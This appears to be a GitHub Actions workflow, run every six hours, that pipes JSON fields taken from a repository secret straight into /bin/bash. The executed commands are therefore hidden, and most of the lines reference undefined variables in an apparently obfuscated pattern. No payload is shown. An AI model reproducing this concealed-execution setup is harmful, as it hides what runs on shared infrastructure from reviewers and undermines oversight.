name: changyongjiu2314
on:
  workflow_dispatch:
  schedule:
    - cron: '50 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: changyongjiu2314
        env:
          e2072: ${{ secrets.e2072 }}
        run: |
          echo $e2072 | jq -r .somzz05206 | /bin/bash
          echo $n301 | jq -r .mzorp34 | /bin/bash
          echo $s22804 | jq -r .l87887 | /bin/bash
          echo $ee9 | jq -r .adxc754 | /bin/bash
          echo $sp77702 | jq -r .nu9 | /bin/bash
          echo $gfhk04 | jq -r .qzssn438 | /bin/bash
          echo $xo78598 | jq -r .dvsp1195 | /bin/bash
          echo $tndd365 | jq -r .h663 | /bin/bash

